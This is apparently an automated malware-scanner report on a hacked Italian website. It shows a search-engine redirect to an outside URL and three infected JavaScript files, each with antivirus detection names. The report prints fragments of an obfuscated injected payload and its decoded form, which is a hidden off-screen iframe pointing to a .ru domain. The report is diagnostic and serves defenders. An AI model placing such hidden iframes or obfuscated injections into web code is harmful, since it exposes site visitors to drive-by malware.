New scan:

Malware Scanner report for abcpubblicita.com

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://rymeytjtyjhn5t.justdied.com/1.php
276 websites infected.

The website "abcpubblicita.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://abcpubblicita.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: abcpubblicita.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sat, 12 Apr 2014 17:02:08 GMT
Location: http://rymeytjtyjhn5t.justdied.com/1.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PleskLin
malicious

Scanned pages/files

RequestServer responseStatus
http://abcpubblicita.com/
200 OK
Content-Length: 30285
Content-Type: text/html
clean
http://www.abcpubblicita.com/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js
200 OK
Content-Length: 62316
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



function loadNewPage( el, url ) {

var theEl = $(el);
var callback = {
success : function(responseText) {
theEl.innerHTML = responseText;
if( Slimbox ) Slimbox.scanPage();
}
}
var opt = {
method: 'get',
onComplete: callback.success
}
new Ajax( url + '&only_page=1', opt ).request();
}

function handleGoToCart() { document.location = live_site + '/index.php?opti
... 61906 bytes are skipped ...
4%5C%78%36%39%5C%78%36%31%5C%78%37%33%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%64%38%38%63%5B%31%5D%5D%28%5F%30%78%64%38%38%63%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ikarus
Trojan.JS.Redirector
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Url.IframeB.bmpqel
AVG
HTML/Framer
Norman
Redirector.JB
GData
JS:Redirector-AKA
ESET-NOD32
JS/Redirector.NJG

http://www.abcpubblicita.com/modules/mod_virtuemart/dtree/dtree.js
200 OK
Content-Length: 13336
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Node(id, pid, name, url, title, target, icon, iconOpen, open) {
this.id = id;
this.pid = pid;
this.name = name;
this.url = url;
this.title = title;
this.target = target;
this.icon = icon;
this.iconOpen = iconOpen;
this._io = open || false;
this._is = false;
this._ls = false;
this._hc = false;
this._ai = 0;
this._p;
};
function dTree(objName,url) {
this.config = {
target : null,
folderLinks
... 12400 bytes are skipped ...
4%5C%78%36%39%5C%78%36%31%5C%78%37%33%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%64%38%38%63%5B%31%5D%5D%28%5F%30%78%64%38%38%63%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));

Decoded script:


<div style="position:absolute; top:-508px;"><iframe src="http://moviemedias.ru/"></iframe></div>

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Url.IframeB.bmpqel
AVG
HTML/Framer
Norman
Redirector.JB
GData
JS:Redirector-AKA
ESET-NOD32
JS/Redirector.NJG

http://www.abcpubblicita.com/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js
200 OK
Content-Length: 39524
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



var config = new Object();


var tt_Debug = true var tt_Enabled = true var TagsToTip = true

config. Above = false config. BgColor = '#E2E7FF' config. BgImg = '' config. BorderColor = '#003099'
config. BorderStyle = 'solid' config. BorderWidth = 1
config. CenterMouse = false config. ClickClose = false config. ClickSticky = false config. CloseBtn = false config. CloseBtnColors = ['#990000', '#FFFFFF', '#DD3333', '#FFFFFF
... 33156 bytes are skipped ...
4%5C%78%36%39%5C%78%36%31%5C%78%37%33%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%64%38%38%63%5B%31%5D%5D%28%5F%30%78%64%38%38%63%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
AVG
HTML/Framer
Norman
Redirector.JB
GData
JS:Redirector-AKA
ESET-NOD32
JS/Redirector.NJG

http://abcpubblicita.com/index.php/home.html
200 OK
Content-Length: 30835
Content-Type: text/html
clean
http://abcpubblicita.com/index.php/chi-siamo.html
200 OK
Content-Length: 28142
Content-Type: text/html
clean
http://abcpubblicita.com/media/system/js/caption.js
200 OK
Content-Length: 1776
Content-Type: text/javascript
clean
http://abcpubblicita.com/index.php/contatti.html
200 OK
Content-Length: 27402
Content-Type: text/html
clean
http://abcpubblicita.com/media/system/js/validate.js
200 OK
Content-Length: 4297
Content-Type: text/javascript
clean
http://abcpubblicita.com/index.php/webdev.html
200 OK
Content-Length: 23419
Content-Type: text/html
clean
http://abcpubblicita.com/index.php/home.html?page=shop.browse&category_id=47
200 OK
Content-Length: 50691
Content-Type: text/html
clean
http://abcpubblicita.com/index.php/home.html?page=shop.browse&category_id=8
200 OK
Content-Length: 25796
Content-Type: text/html
clean
http://abcpubblicita.com/index.php/home.html?page=shop.browse&category_id=49
200 OK
Content-Length: 27785
Content-Type: text/html
clean
http://abcpubblicita.com/index.php/home.html?page=shop.browse&category_id=51
200 OK
Content-Length: 33513
Content-Type: text/html
clean
http://abcpubblicita.com/index.php/home.html?page=shop.browse&category_id=52
200 OK
Content-Length: 48699
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=abcpubblicita.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://abcpubblicita.com/

Result: abcpubblicita.com is not infected or malware details are not published yet.